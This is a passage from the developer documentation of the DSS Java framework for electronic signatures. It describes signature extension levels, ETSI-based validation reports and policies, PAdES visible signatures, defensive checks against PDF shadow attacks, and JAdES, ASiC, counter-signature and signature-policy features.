or expired and close to the time that the AdES signature was produced. It provides a protection against repudiation. The framework adds the timestamp only if there is no timestamp or there is one but the creation of a new extension of the level-T is deliberate (using another TSA). It is not possible to extend a signature which already incorporates higher level as -LT or -LTA. In the theory it would be possible to add another -T level when the signature has already reached level -LT but the framework prevents this operation. Note that if the signed document contains multiple signatures, then all the signatures will be extended to level -T. It is also possible to sign a document directly at level -T.\n\nHere is an example of creating an extension of type T:\n\n[source,java,indent=0]\n.Extend a XAdES signature\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/ExtendSignXmlXadesBToTTest.java[tags=demo]\n----\n\nHere is the result of adding a new extension of type-T to an already existing -T level signature:\n\n.XAdES Unsigned Signature Properties\ninclude::_samples\/xades-extend-t-to-t.adoc[]\n\n=== BASELINE-LT and -LTA\n\nFor these types of extensions, the procedure to follow is the same as the case of the extension of type T. Please refer to the chapter XAdES Profiles to know specific parameters for each level of signature and which must be positioned.\n\n[[signatureValidation]]\n== Signature Validation\n\nGenerally and following ETSI standard, the validation process of an electronic signature must provide one of these three following statuses: TOTAL-FAILED, TOTAL-PASSED or INDETERMINATE. A TOTAL-PASSED response indicates that the signature has passed verification and it complies with the signature validation policy. A TOTAL_FAILED response indicates that either the signature format is incorrect or that the digital signature value fails the verification. An INDETERMINATE validation response indicates that the format and digital signature verifications have not failed but there is an insufficient information to determine if the electronic signature is valid. For each of the validation checks, the validation process must provide information justifying the reasons for the resulting status indication as a result of the check against the applicable constraints. In addition, the ETSI standard defines a consistent and accurate way for justifying statuses under a set of sub-indications.\n\n===\tValidation Process\n\nSince version 4.7 of the DSS framework the validation process is based on the latest ETSI standard <<R09>>. It is driven by the validation policy and allows long term signature validation. It not only verifies the existence of certain data and their validity, but it also checks the temporal dependences between these elements. The signature check is done following basic building blocks. On the simplified diagram below, showing the process of the signature validation, you can follow the relationships between each building block which represents a logic set of checks used in validation process.\n\n.Signature Validation Process\nimage::sig_validation_process.jpg[]\n\nNote that the current version of the framework during the validation process does not indicate what part of a document was signed. However, in a case of XAdES signature XPath transformations presented in the signature will be applied, in the case of CAdES or PAdES signature the whole document must be signed.\n\nAt the end of the validation process four reports are created. They contain the different detail levels concerning the validation result. They provide four kinds of visions for the validation process: macroscopic, microscopic, input data and ETSI Validation report conformant with the standard <<R09>>. For more information about these reports, please refer to \"Simple Report\" chapter.\n\nBelow is the simplest example of the validation of the signature of a document. The first thing to do is instantiating an object named validator, which orchestrates the verification of the different rules. To perform this it is necessary to invoke a static method fromDocument() on the abstract class `SignedDocumentValidator`. This method returns the object in question whose type is chosen dynamically based on the type of source document. \n\nThe next step is to create an object that will check the status of a certificate using the Trusted List model (see \"Trusted Lists of Certification Service Provider\" for more information). In order to achieve this, an instance of a `CertificateVerifier` must be created with a defined source of trusted certificates. In our example, the trusted source is instantiated with `CommonTrustedCertificateSource` class. As well as a trusted source the CertificateVerifier object needs an OCSP and\/or CRL source and a TSL source (which defines how the certificates are retrieved from the Trusted Lists). See chapter \"Management of CRL and OCSP Sources\" for more information concerning sources.\n\n[source,java,indent=0]\n.Validation of a signature\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/ValidateSignedXmlXadesBTest.java[tags=demo]\n----\n\nNOTE: When using the TrustedListsCertificateSource class, for performance reasons, consider creating a single instance of this class and initialize it only once.\n\nNOTE: In general, the signature must cover the entire document so that the DSS framework can validate it. However, for example in the case of a XAdES signature, some transformations can be applied on the XML document. They can include operations such as canonicalization, encoding\/decoding, XSLT, XPath, XML schema validation, or XInclude. XPath transforms permit the signer to derive an XML document that omits portions of the source document. Consequently those excluded portions can change without affecting signature validity. \n\n[[signedDocumentValidator]]\n==== SignedDocumentValidator\n\nFor execution of the validation process, DSS uses the 'SignedDocumentValidator' class. The DSS framework provides five implementations of validator:\n \n * `XMLDocumentValidator` - validates documents in XML format (XAdES format);\n * `CMSDocumentValidator` - validates documents in CMS format (CAdES format);\n * `PDFDocumentValidator` - validates documents in PDF format (PADES format);\n * `JWSCompactDocumentValidator` - validates documents with base64url encoded content (JAdES compact format);\n * `JWSSerializationDocumentValidator` - validates documents in JSON format (JAdES serialization formats);\n * `ASiCContainerWithXAdESValidator` - validates ASiC with XAdES containers;\n * `ASiCContainerWithCAdESValidator` - validates ASiC with CAdES containers;\n * `DetachedTimestampValidator` - validates CMS timestamps provided alone.\n\nDSS initializes a relevant validator based on specific characteristics of an input file (e.g. a PDF file version declaration for a PDF file). It checks the file format and loads the required validator from a classpath. Below you can find a list of settings that can be used for the configuration of the class.\n\n[source,java,indent=0]\n.SignedDocumentValidator usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo]\n----\n\n===\tValidation Result Materials\n\nThe result of the validation process consists of three elements: \n\n * the Simple Report, \n * the Detailed Report,\n * the Diagnostic Data and\n * the ETSI Validation Report.\n \nAll these reports are encoded using XML, which allows the implementer to easily manipulate and extract information for further analysis. For each report, XML Schema and JaxB model are available as maven dependencies.\n\nDSS also provides XSLT to able to generate PDF or HTML reports (simple and detailed reports).\n\nYou will find below a detailed description of each of these elements.\n\n==== Simple Report \n\nThis is a sample of the simple validation report:\n\n.Simple Report \ninclude::_samples\/simple-report-example.adoc[]\n\nThe result of the validation process is based on very complex rules. The purpose of this report is to make as simple as possible the information while keeping the most important elements. Thus the end user can, at a glance, have a synthetic view of the validation. To build this report the framework uses some simple rules and the detailed report as input.\n\n==== Detailed Report\n\nThis is a sample of the detailed validation report. Its structure is based on the ETSI standard <<R09>> and is built around Basic Building Blocks, Basic Validation Data, Timestamp Validation Data, AdES-T Validation Data and Long Term Validation Data. Some segments were deleted to make reading easier. They are marked by three dots:\n\n.Detailed Report \ninclude::_samples\/detailed-report-example.adoc[]\n\nFor example the Basic Building Blocks are divided into seven elements:\n\n * FC - Format Checking\n * ISC - Identification of the Signing Certificate\n * VCI - Validation Context Initialization\n * RFC - Revocation Freshness Checker\n * XCV - X.509 certificate validation\n * CV - Cryptographic Verification\n * SAV - Signature Acceptance Validation\n \nThe following additional elements also can be executed in case of validation in the past : \n\n * PCV - Past Certificate Validation\n * VTS - Validation Time Sliding process\n * POE extraction - Proof Of Existence extraction \n * PSV - Past Signature Validation\n\nPast certificate\/signature validation is used when basic validation of a certificate\/signature fails at the current time with an INDETERMINATE status such that the provided proofs of existence may help to go to a determined status. The process shall initialize the _best-signature-time_ either to a time indication for a related POE provided, or the current time when this parameter has not been used by the algorithm.\n\n * *Best-signature-time* is an internal variable for the algorithm denoting the earliest time when it can be trusted by the SVA (either because proven by some POE present in the signature or passed by the DA and for this reason assumed to be trusted) that a signature has existed. <<R09>>\n\nEach block contains a number of rules that are executed sequentially. The rules are driven by the constraints defined in the validation policy. The result of each rule is OK or NOT OK. The process is stopped when the first rule fails. Each block also contains a conclusion. If all rules are met then the conclusion node indicates PASSED. Otherwise FAILED or INDETERMINATE indication is returned depending on the ETSI standard definition. \n\n==== Diagnostic Data\n\nThis is a data set constructed from the information contained in the signature itself, but also from information retrieved dynamically as revocation data and information extrapolated as the mathematical validity of a signature. All this information is independent of the applied validation policy. Two different validation policies applied to the same diagnostic data can lead to different results.\n\nThis is an example of the diagnostic data for a XAdES signature. Certain fields and certain values were trimmed or deleted to make reading easier:\n\n.Diagnostic Data\ninclude::_samples\/diagnostic-data-example.adoc[]\n\n==== ETSI Validation Report\n\nThe ETSI Validation Report represents an implementation of TS 119 102-2 (cf. <<R13>>). The report contains a standardized result of an ASiC digital signature validation. It includes the original validation input data, the applied validation policy, as well as the validation result of one or more signature(s) and its(their) constraints.\n\nThis is an example of the ETSI validation report:\n\n.ETSI Validation Report (TS 119 102-2)\ninclude::_samples\/etsi-validation-report-example.adoc[]\n\n[[validationPolicy]]\n=== Validation Policy\n\nThe validation process may be driven by a set of constraints that are contained in the XML policy file.\n\nIn order to run a validation process with a custom validation policy, an XML file shall be created in compliance with the https:\/\/github.com\/esig\/dss\/blob\/master\/dss-policy-jaxb\/src\/main\/resources\/xsd\/policy.xsd[policy.xsd] schema and passed to the relevant `DocumentValidator` as shown below.\n\n[source,java,indent=0]\n.Custom validation policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=validationPolicy]\n----\n\n==== XML policy structure\n\nThe validation policy allows to define different behavior for various validating token types or signature formats. The following groups are considered:\n\n * `ContainerConstraints` - defines rules for processing of ASiC containers validation;\n * `SignatureConstraints` - defines rules for signature basic building blocks processing and the related certificate chain;\n * `CounterSignatureConstraints` - allows to define custom rules for counter signature processing;\n * `Timestamp` - defines rules for timestamp validation;\n * `Revocation` - defines rules for revocation data validation;\n * `Cryptographic` - defines common rules for cryptographic validation of used algorithms. The general constraints are used when no cryptographic constraints are defined for a particular token type;\n * `Model` - defines the way of a certificate chain processing;\n * `eIDAS` - defines rules for validation of Trusted Lists.\n\n==== Constraints\n\nEach constraint defined in the policy forces an execution of a relevant check in the validation process.\n\nNOTE: If a constraint is missing in the policy - the check is not processed.\n\nThe following constraint types are supported:\n\n * `LevelConstraint` - a simple constraint type with a defined processing `Level`;\n * `MultiValuesConstraint` - allows to define a set of accepted values relatively to the using constraint.\n\n==== Level\n\nThe `Level` attribute of a constraint defines a validation process behavior in case of a check failure. While used, the following behaviors apply in case of a check failure:\n\n * `FAIL` - brakes the validation process and returns the relevant indication;\n * `WARN` - continues the validation process and returns a warning message to the validation process output;\n * `INFORM` - continues the validation process and returns an information message to the validation process output;\n * `IGNORE` - processes the check in a silent mode (equivalent to a not defined constraint).\n\n==== Multi Values Constraint\n\nWhen using the `MultiValuesConstraint`, a list of acceptable values shall be defined in the list of `<Id>...<\/Id>` elements, one for each accepted value. While doing, the following rules apply:\n\n * Empty list of values -> accept only empty values for the item in question, fails otherwise;\n * `\"*\"` constraint value -> accepts all values, reject empty list of values;\n * Custom values -> accepts only item values matching the constraint.\n\n==== Cryptographic constraints\n\nCryptographic constraints define a list of acceptable cryptographic algorithms and their expiration dates when needed. The following settings are possible:\n\n * `AcceptableEncryptionAlgo` - defines a list of acceptable encryption algorithms. All tokens and signatures using other algorithms will be rejected.\n * `MiniPublicKeySize` - defines the minimal allowed public key size to be used with the defined encryption algorithms. An algorithm with a key size less than the defined one will be rejected. The minimal key size if required to be defined for an encryption algorithm, otherwise all used key sizes will be rejected.\n * `AcceptableDigestAlgo` - defines a list of acceptable digest algorithms. All tokens and signatures using other algorithms will be rejected.\n * `AlgoExpirationDate` - defines expiration dates for the algorithms. The algorithm is rejected when it is used after the defined date. If the algorithm expiration date is not defined, or set to null, the algorithm is treated as reliable for an unlimited time.\n\n==== The default XML policy\n\nThe default XML validation policy is present below.\n\n.constraint.xml (default policy is provided in dss-policy-jaxb module)\ninclude::_samples\/constraint.adoc[]\n\n== CAdES signature (CMS)\n\nTo familiarize yourself with this type of signature it is advisable to read the following document:\n\n* CAdES Specifications (cf. <<R02>>)\n\nTo implement this form of signature you can use the XAdES examples. You only need to instantiate the CAdES object service and change the SignatureLevel parameter value. Below is an example of the CAdES-Baseline-B signature:\n\n[source,java,indent=0]\n.Signing a file with CAdES\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlCadesBTest.java[tags=demo]\n----\n\n== PAdES signature (PDF)\n\nThe standard ISO 32000-1 (cf. <<R06>>) allows defining a file format for portable electronic documents. It is based on PDF 1.7 of Adobe Systems. Concerning the digital signature it supports three operations: \n\n * Adding a digital signature to a document,\n * Providing a placeholder field for signatures,\n * Checking signatures for validity.\n\nPAdES defines eight different profiles to be used with advanced electronic signature in the meaning of European Union Directive 1999\/93\/EC (cf. <<R07>>):\n\n * PAdES Basic - PDF signature as specified in ISO 32000-1 (cf. <<R06>>). The profile is specified in ETSI EN 319 142 (cf. <<R03>>).\n * PAdES-BES Profile - based upon CAdES-BES as specified in ETSI EN 319 122 (cf. <<R02>>) with the option of a signature time-stamp (CAdES-T).\n * PAdES-EPES profile - based upon CAdES-EPES as specified in ETSI EN 319 122 (cf. <<R02>>). This profile is the same as the PAdES - BES with the addition of a signature policy identifier and optionally a commitment type indication.\n * PAdES-LTV Profile - This profile supports the long term validation of PDF Signatures and can be used in conjunction with the above-mentioned profiles.\n * Four other PAdES profiles for XML Content.\n\nTo familiarize yourself with this type of signature it is advisable to read the documents referenced above.\n\nBelow is an example of code to perform a PAdES-BASELINE-B type signature:\n\n[source,java,indent=0]\n.Signing a PDF file with PAdES\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBTest.java[tags=demo]\n----\n\nIn order to add a timestamp to the signature (PAdES-T or LTA), a TSP source must be provided to the service.\n\nTo create PAdES-BASELINE-B level with additional options: signature policy identifier and optionally a commitment type indication, please observe the following example in code 5.\n\nAll these parameters are optional.\n\n[source,java,indent=0]\n.Defining a Signature Policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBTest.java[tags=policy]\n----\n\nThe extension of a signature of the level PAdES-BASELINE-B up to PAdES-BASELINE-LTA profile will add the following features:\n\n * Addition of validation data to an existing PDF document which may be used to validate earlier signatures within the document (including PDF signatures and time-stamp signatures). \n * Addition of a document time-stamp which protects the existing document and any validation data. \n * Further validation data and document time-stamp may be added to a document over time to maintain its authenticity and integrity.\n\n=== PAdES Visible Signature\n\nThe framework also allows creation of PDF files with visible signature as specified in ETSI EN 319 142 (cf. <<R03>>). In the `SignatureParameters` object, there's a special attribute named `SignatureImageParameters`. This parameter allows you customize the visual signature (with text, with image or with image and text).\nBelow there is an example of code to perform a PADES-BASELINE-B type signature with a visible signature:\n\n[source,java,indent=0]\n.Add a visible signature to a PDF document\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=parameters-configuration;sign]\n----\n\nAdditionally, DSS also allows you to insert a visible signature to an existing field :\n\n[source,java,indent=0]\n.Add a visible signature to an existing field\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=select-pdf-signature-field]\n----\n\nIn case of placing an image or text to an existing field, the visible signature will fill out the whole available area of the field.\n\n==== Visible signature parameters (image and text)\n\nThis chapter introduces existing parameters for creation of visible signatures with DSS.\nDSS has three implementations for visible signature drawing:\n\n * *OpenPDF (iText)* - supports separate image and text drawing;\n * *PDFBox Default* - supports separate image and text drawing, as well as a joint drawing of image and text together. Transforms text to an image;\n * *PDFBox Native* - supports separate image and text drawing, as well as a joint drawing of image and text together. Prints text in a native way, that increases quality of the produced signature.\n\n===== Positioning\n\nDSS provides a set of functions allowing to place the signature field on a specific place in the PDF page :\n\n[source,java,indent=0]\n.Visible signature positioning\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PAdESVisibleSignatureSnippet.java[tags=positioning]\n----\n\n===== Dimensions\n\nDSS framework provides a set of functions to manage the signature field size :\n\n[source,java,indent=0]\n.Visible signature dimensions\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PAdESVisibleSignatureSnippet.java[tags=positioning]\n----\n\n===== Text Parameters\n\nThe available implementations allow placing of a visible text to a signature field :\n\n[source,java,indent=0]\n.List of available visible text parameters\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=text]\n----\n \n===== Text and image combination\n\nDSS provides a set of functions to align a text respectively to an image. The parameters must be applied to a 'SignatureImageTextParameters' object :\n\n[source,java,indent=0]\n.Combination of text and image parameters\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=textImageCombination]\n----\n \nThe result of applying the foregoing transformations is provided on the image below:\n\nimage::visual-sig-text-parameters.jpg[]\n\n==== Fonts usage\n\nSince version 5.5, DSS supports two types of fonts. The custom font must be added as an instance of `DSSFont` interface to a `SignatureImageTextParameters` object.\n`DSSFont` interface has following common implementations:\n\n * `DSSFileFont` for using of physical fonts, which must be embedded to the produced PDF document. To create an instance of the class, you must pass to a `DSSFileFont` constructor an object of `DSSDocument` type or InputStream of the font file;\n * `DSSJavaFont` for using of logical fonts (default Java fonts). The logical Java fonts allow you to significantly reduce the document size, because these fonts cannot be embedded to the final PDF document. Be aware, because of the fact, using of logical fonts does not allow producing PDF documents satisfying the PDF\/A standard. To create an instance of this class, you should pass as an input a `java.awt.Font` object or target font parameters (name, style, size).\n\nWARNING: Logical fonts may have different implementations depending on a used PAdES Visible signature service or Operating System (OS). Keep this in mind when switching an implementation or system environment.\n\nAs well as classes allowing to define native fonts for used implementations (available since DSS 5.7):\n\n * `ITextNativeFont` to be used with `ITextSignatureDrawerFactory`;\n * `PdfBoxNativeFont` to be used with `PdfBoxNativeObjectFactory`.\n\nYou can create a custom font as following (for a physical font):\n\n[source,java,indent=0]\n.Add a custom font as a file\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=font]\n----\n\nFor a logical font:\n\n[source,java,indent=0]\n.Java font usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleExistingTest.java[tags=font]\n----\n\nFor a native font:\n\n[source,java,indent=0]\n.Native font usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PAdESVisibleSignatureSnippet.java[tags=nativeFont]\n----\n\nBy default, DSS uses a Google font : 'PT Serif Regular' (its physical implementation).\n\nNOTE: 'Native PDFBox Drawer' implementation supports only one of the following fonts: SERIF, SANS-SERIF, MONOSPACED, DIALOG and DIALOG_INPUT.\n\n=== Shadow attack detection\n\n\"Shadow attack\" is a class of attacks on a signed PDF document that constitutes a change of a visual content of a document after the signature has been made. Due to a structure of PDF document, the signature stays cryptographically valid even after the content's modification has been taken place. There are no algorithms to detect the malicious change with 100% guarantee. For more information, please refer to https:\/\/pdf-insecurity.org\/[the website].\n\nSince v5.8, DSS provides a set of own utils to detect the \"shadow attack\" on a signed PDF document. The following algorithms have been introduced:\n\n * `Page amount difference` - the validation tool compares the number of pages between the obtained PDF and signed revision. If the numbers do not match, the validation fail. The validation level can be configured within the <<validationPolicy>> with the constraint `<PdfPageDifference>`.\n * `Annotations overlap` - DSS checks if any annotation overlaps occurred. The overlapping is potentially dangerous, because some annotations can cover a visual content, e.g. forms and signature fields. The validation level can be configured with the constraint `<PdfAnnotationOverlap>`.\n * `Visual difference` - DSS verifies the visual difference between the provided document and signed revision, excluding the newly created annotations (between the validating revisions). The validation level can be configured with the constraint `<PdfVisualDifference>`.\n\n== JAdES signature (JWS)\n\nSince v5.8, DSS includes a possibility of creation and validation of JSON Advanced signatures.\n\nJSON format for AdES Signatures (cf. [R05]) represents an extension of JSON Web Signatures (JWS) as specified in https:\/\/tools.ietf.org\/html\/rfc7515[IETF RFC 7515].\n\nWARNING: The implementation is based on a draft of the standard ETSI TS 119 182-1. Some modifications can occur in future releases.\n\nA typical example of a JAdES signature creation is represented below:\n\n[source,java,indent=0]\n.Signing a file with JAdES\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlJadesBTest.java[tags=demo]\n----\n\nThe specific parameters for JAdES signature are described in the next sections.\n\n=== JWS Serialization type\n\nA JWS signature can be represented in different forms which are supported by the JAdES as well:\n\n * `COMPACT_SERIALIZATION` represents a compact, URL-safe serialization. It has no JWS Unprotected Header, therefore only JAdES-BASELINE-B level is possible with the format.\n * `JSON_SERIALIZATION` represents a JSON object with a collection of signatures inside the `signatures` header that allows a parallel signing. It allows JAdES-BASELINE-T\/-LT\/-LTA signature extension levels.\n * `FLATTENED_JSON_SERIALIZATION` represents a JSON object with a single signature container. It allows JAdES-BASELINE-T\/-LT\/-LTA signature extension levels.\n\n[source,java,indent=0]\n.JWS Serialization type usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlJadesBTest.java[tags=serialization]\n----\n\n=== JAdES Signature Packaging\n\nJAdES signatures allow two types of JWS Payload (signed data) inclusion: `ENVELOPING` and `DETACHED`.\n\n==== Enveloping packaging\n\nWith `ENVELOPING` packaging the JWS Payload is enveloped into the JAdES Signature. The type only allows signing one document.\n\n==== Detached packaging\n\nA simple JWS signature allows a `DETACHED` packaging by omitting the JWS Payload in the created signature. For the validation process the detached content shall be provided and it is treated in the same way as attached.\n\nTo create a such signature, the parameter `SigDMechanism.NO_SIG_D` shall be set. The solution allows signing of only one document.\n\nThe JAdES standard [R05] provides a possibility for signing of multiple documents withing one signature in a detached way.\n\nThe following mechanisms are possible:\n\n * `HTTP_HEADERS` is used to sign an HTTP request. The signature may explicitly sign several HTTP headers (represented by the class `HTTPHeader`), as well as the HTTP message body (see the `HTTPHeaderDigest` class).\n\n[source,java,indent=0]\n.Configuration for signing with detached mechanism HttpHeaders\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignHttpHeadersJadesBTest.java[tags=demo]\n----\n\n * `OBJECT_ID_BY_URI` can be used for signing of multiple documents. The signed files are dereferenced by URIs and their content is concatenated for generation of the JWS Payload.\n\n * `OBJECT_ID_BY_URI_HASH` similarly provides a possibility to sign multiple documents, by signing the computed digests of the original documents. The JWS Payload for this format stays empty.\n\n[source,java,indent=0]\n.Configuration for signing with detached mechanism ObjectIdByURIHash\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignMultipleDocumentsJadesTTest.java[tags=demo]\n----\n\n=== Base64Url encoding\n\nThe `Base64Url` represents a Base64 encoded format with URI safe alphabet (see https:\/\/tools.ietf.org\/html\/rfc4648[RFC 4648]).\n\nJAdES signatures (as well as JWS) force some values to be Base64Url-encoded, while provides a possibility to customize the format for some of them.\n\nDSS provides options to configure encoding for the following elements:\n\n * JWS Payload can be represented as Base64Url encoded octets (by default), as well as can be present in its initial form (with the protected header `b64` set to `false`).\n\n[source,java,indent=0]\n.Use unencoded JWS Payload\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignHttpHeadersJadesBTest.java[tags=unencodedPayload]\n----\n\n * The components of the unsigned header `etsiU` can occur either as Base64Url encoded strings (by default), or as clear JSON objects.\n\nNOTE: All components inside the `etsiU` header shall be present in the same form (Base64Url encoded or as clear JSON).\n\nWARNING: The current version of DSS does not allow JAdES-BASELINE-LTA level creation for `etsiU` components in their clear JSON representation.\n\n[source,java,indent=0]\n.Represent EtsiU components as clear JSON instances\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignMultipleDocumentsJadesTTest.java[tags=clearEtsiU]\n----\n\n== ASiC signature (containers)\n\nWhen creating a digital signature, the user must choose between different packaging elements, namely enveloping, enveloped or detached. This choice is not obvious, because in one case the signature will alter the signed document and in the other case it is possible to lose the association between the signed document and its signature. That's where the standard ETSI EN 319 162 (cf. <<R04>>) offers a standardized use of container forms to establish a common way for associating data objects with advanced signatures or time-stamp tokens.\n\nA number of application environments use ZIP based container formats to package sets of files together with meta-information. ASiC technical specification is designed to operate with a range of such ZIP based application environments. Rather than enforcing a single packaging structure, ASiC describes how these package formats can be used to associate advanced electronic signatures with any data objects.\n\nThe standard defines two types of containers; the first (ASiC-S) allows you to associate one or more signatures with a single data element. In this case the structure of the signature can be based (in a general way) on a single CAdES signature or on multiple XAdES signatures or finally on a single TST; the second is an extended container (ASiC-E) that includes multiple data objects. Each data object may be signed by one or more signatures which structure is similar to ASiC-S. This second type of container is compatible with OCF, UCF and ODF formats.\n\nFor the moment the DSS framework has some restrictions on the containers you can generate, depending on the input file. If the input file is already an ASiC container, the output container must be the same type of container based on the same type of signature. If the input is any other file, the output does not have any restriction.\n\n.ASiC containers\n|===\n|Input |Output\n\n|ASiC-S CAdES |ASiC-S CAdES\n\n|ASiC-S XAdES |ASiC-S XAdES\n\n|ASiC-E CAdES |ASiC-E CAdES\n\n|ASiC-E XAdES |ASiC-E XAdES\n\n|Binary |ASiC-S CAdES, ASiC-S XAdES, ASiC-E CAdES, ASiC-E XAdES\n|===\n\nThis is an example of the source code for signing a document using ASiCS-S based on XAdES-B:\n\n[source,java,indent=0]\n.Sign a file within an ASiC-S container\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignOneFileWithASiCSBTest.java[tags=demo]\n----\n\nThis is another example of the source code for signing multiple documents using ASiCS-E based on CAdES:\n\n[source,java,indent=0]\n.Sign multiple files within an ASiC-E container\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignMultipleDocumentsWithASiCSEWithCAdESTest.java[tags=demo]\n----\n\nPlease note that you need to pass only few parameters to the service. Other parameters, although are positioned, will be overwritten by the internal implementation of the service. Therefore, the obtained signature is always based on CAdES and of DETACHED packaging.\n\nIt is also possible with the framework DSS to make an extension of an ASiC container to the level XAdES-BASELINE-T or -LT.\n\n== Counter signatures\n\nSince v5.8 DSS allows producing of counter signatures according to the corresponding AdES formats.\n\nNOTE: Counter signature does not provide a Proof Of Existence for a signed signature! Use signature extension \/ timestamping for this purpose.\n\nThe following formats are supported for the counter signature creation:\n\n * `XAdES` - multiple, nested and extended counter signatures (up to LTA level) are allowed;\n * `CAdES` - B-level counter signatures are allowed, as well as multiple counter signatures;\n * `JAdES` - multiple, nested and extended signatures (up to LTA level) are allowed;\n * `ASiC` - counter signatures are allowed according to the used format (XAdES or CAdES).\n\nIn order to create a counter signature, the DSS Identifier (or XML Id for XAdES) of the target signature you want to sign shall be provided within the parameters. The example below represents a counter signature creation:\n\n[source,java,indent=0]\n.Counter signature creation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/CounterSignXadesBTest.java[tags=demo]\n----\n\n== Various parameters\n\n[[signaturePolicy]]\n=== Signature policy\n\nWith the new standards the policy handling is linked to -B level. The old -EPES level is not used anymore by the framework. This does not alter the structure of the old signature but only modifies how to control the process of its creation.\n\nThe DSS framework allows you to reference a signature policy, which is a set of rules for the creation and validation of an electronic signature. It includes two kinds of text:\n\n* In a human readable form:\nIt can be assessed to meet the requirements of the legal and contractual context in which it is being applied.\n\n* In a machine processable form:\nTo facilitate its automatic processing using the electronic rules.\n\nIf no signature policy is identified then the signature may be assumed to have been generated or verified without any policy constraints, and hence may be given no specific legal or contractual significance through the context of a signature policy.\n\nThe signer may reference the policy either implicitly or explicitly. An implied policy means the signer follows the rules of the policy but the signature does not indicate which policy. It is assumed the choice of policy is clear from the context in which the signature is used and SignaturePolicyIdentifier element will be empty. When the policy is not implied, the signature contains an ObjectIdentier that uniquely identifies the version of the policy in use. The signature also contains a hash of the policy document to make sure that the signer and verifier agree on the contents of the policy document.\n\nThis example demonstrates an implicit policy identifier. To implement this alternative you must set SignaturePolicyId to empty string.\n\n[source,java,indent=0]\n.XAdES with implicit policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBImplicitPolicyTest.java[tags=demo]\n----\n\nAn XML segment will be added to the signature's qualified and signed properties:\n\ninclude::_samples\/xades-implicit-policy.adoc[]\n\nThe next example demonstrates an explicit policy identifier. This is obtained by setting -B profile signature policy and assigning values to the policy parameters. The Signature Policy Identifier is a URI or OID that uniquely identifies the version of the policy document. The signature will contain the identifier of the hash algorithm and the hash value of the policy document. The DSS framework does not automatically calculate the hash value; it is to the developer to proceed with the calculation using for example java.security.MessageDigest class (rt.jar). It is important to keep the policy file intact in order to keep the hash constant. It would be wise to make the policy file read-only. See also chapter 7 for further information.\n\n[source,java,indent=0]\n.XAdES with explicit policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBExplicitPolicyTest.java[tags=demo]\n----\n\nThe following XML segment will be added to the signature qualified & signed properties (<QualifyingProperties><SignedProperties>):\n\n.XAdES Signature Policy element\ninclude::_samples\/xades-explicit-policy.adoc[]\n\n=== Signature Policy Store\n\nSince v5.8 DSS provides a possibility of incorporation of a Signature Policy Store element as an unsigned property to the existing signature file.\n\nThe following signature formats support the Signature Policy Store addition:\n\n* XAdES (as well as ASiC with XAdES);\n* CAdES (as well as ASiC with CAdES);\n* JAdES.\n\nNOTE: Being an unsigned component the Signature Policy Store is not protected by a digital signature, unlike a Signature Policy Identifier incorporated into the signed properties.\n\nBefore incorporating of a Signature Policy Store, you need to ensure the target signature contains the matching Signature Policy Identifier element (see ch. <<signaturePolicy>>).\n\nAn example of a Signature Policy Store creation is available below:\n\n[source,java,indent=0]\n.Add SignaturePolicyStore\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBExplicitPolicyTest.java[tags=addSPS]\n----\n\n=== Trust anchor inclusion policy\n\nIt is possible to indicate to the framework if the certificate related to the trust anchor should be included to the signature or not. The setter #setTrustAnchorBPPolicy of the BLevelParameters class should be used for this purpose.\n\nThis rule applies as follows: when -B level is constructed the trust anchor is not included, when -LT level is constructed the trust anchor is included.\n\nNOTE: When trust anchor baseline profile policy is defined only the certificates previous to the trust anchor are included when -B level is constructed.\n\n== Timestamps\n\n=== Timestamp creation\n\nSince DSS 5.6 the framework allows an independent document timestamping (without a signature). The following Document Signature Services support the timestamping :\n\n * `PAdESService` - adds a timestamp to a 